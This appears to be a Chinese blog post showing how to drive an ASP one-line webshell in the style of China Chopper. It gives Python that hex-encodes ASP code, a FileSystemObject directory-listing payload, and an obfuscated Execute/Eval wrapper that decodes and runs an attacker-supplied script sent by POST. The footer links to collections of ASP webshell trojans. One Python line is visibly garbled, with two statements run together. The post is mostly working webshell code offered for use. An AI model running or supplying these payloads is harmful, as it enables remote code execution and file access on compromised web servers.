ASP 一句话执行ASP代码

读取文件

self.asp_data=txt_Handle.asp_Handle(self.open_txt("asp.asp"))  #asp内容

def asp_Handle(ASP_data):
    ASP_data=asp_x0_zs(ASP_data)  #清除<% %>
    #ASP_data=asp_x2_zs(ASP_data)  #清除'注释
    #ASP_data=open_file_null(ASP_data)     #清除空行
    #ASP_data=asp_x2_zs(ASP_data) #清除'注释
    #ASP_data=str_char(ASP_data)  #对字符串处理
    #ASP_data=urllib.quote(ASP_data)  #quote URL编码
    print ASP_dataASP_data=asp_shell(binascii.b2a_hex(ASP_data.encode("utf8")))  #hex
    #ASP_data=urllib.quote(ASP_data)  #quote URL编码
    return ASP_data

对ASP代码做一些处理

Dim RR:RR=bd(Request("z1")):Function FD(dt):FD=Year(dt)&"-":If Len(Month(dt))=1 Then:FD = FD&"0":End If:FD=FD&Month(dt)&"-":If Len(Day(dt))=1 Then:FD=FD&"0":End If:FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":":If Len(Second(dt))=1 Then:FD=FD&"0":End If:FD=FD&Second(dt):End Function:SET C=CreateObject("Scripting.FileSystemObject"):Set FO=C.GetFolder(""&RR&""):If Err Then:Response.Write("ERROR:// "&Err.Description):Err.Clear:Else:For Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10):Next:For Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10):Next:End If

在看菜刀的时候看菜刀对内容做出了一些处理

但是在菜刀的自写脚本中并未对特殊字符做出处理但是我在测试的时候还是发现还是要对一些字符做出处理否则无法运行比如“

Response.Write("http://blog.csdn.net/webxscan")

strA = "document.write("&chr(34)&");"

##################################################################

上边说的是代码部分的处理

下面说代码的执行

{PASS}=Execute("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""{SCRIPT}"""")):Response.Write(""""|<-""""):Response.End"")")

#########

long=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""----------------"""")):Response.Write(""""|<-""""):Response.End"")")

这是执行将代码转换成hex就行了放在{SCRIPT} 里

然后POST提交就行了

有兴趣可以联系我神龙：QQ:29295842

blog: http://blog.csdn.net/webxscan

ASP 一句话执行ASP代码相关推荐

asp一句话html,asp常用的一句话木马大全
[入侵技术] ASP一句话木马大全 ""Then Execute(Request("MH"))%> ""thensession(&qu ...
LadonGo实现菜刀连接webshell一句话执行cmd代码
背景最近VPS被人D比较卡,有时候M都不定连得上,或者连上了也难代理出来,所以需要一个命令行下连接内网WEBSHELL执行命令的工具,当然这个功能Ladon早有了.主要是因为在Linux下横向渗透连 ...
转载：ASP.NET在后台代码实现个功能，根据选择提示用户是否继续执行操作
这种情况是指在后台处理一个HTTP Post命令时将时序重新交给浏览器端,然后运行javascript,然后再回到服务器端,然后继续进行后边的操作.如果你会画时序图,就可以发现这种有着两个来回通讯的程 ...
ASP实例:6行代码实现无组件上传
ASP实例:6行代码实现无组件上传目前有很多无组件上传类,我大概看了一下,大多写的相当复杂,有的居然还只能传文本最关键的是没有10行代码以下的 :) 我花了一个晚上时间研究了一下ADODB.Str ...
[转]ASP.NET(C#)常用代码30例
[转]ASP.NET(C#)常用代码30例 1. 打开新的窗口并传送参数: 传送参数: response.write("<script>window.open('*.aspx?i ...
ASP批量更新数据代码
ASP批量更新数据代码 %> 两个文件 ..cn.asp 连接数据库用的 ..cn3.asp 执行文件 . cn.asp 源代码 <% dim conn dim dbpath bb=&qu ...
ASP.NET的网页代码模型及生命周期
第4章 ASP.NET的网页代码模型及生命周期从本章开始,就进入了ASP.NET应用程序开发的世界.在了解了C#的结构,以及面向对象的概念后,就可以从面向对象的思想开发ASP.NET应用程序.在A ...
ASP.NET 例程完全代码版(3)——随意创建图形信息
随意创建图形信息功能: 可以选择输出图象的文本: 可以选择文本的颜色: 可以选择背景的颜色: 可以选择字体: 可以选择字号: 用途:比如显示自己的一个计数器,或者验证码 ...
ASP 三十条精华代码
ASP 三十条精华代码 1. οncοntextmenu="window.event.returnvalue=false" 将彻底屏蔽鼠标右键 <table border ο ...

ASP 一句话执行ASP代码

ASP 一句话执行ASP代码相关推荐

最新文章

热门文章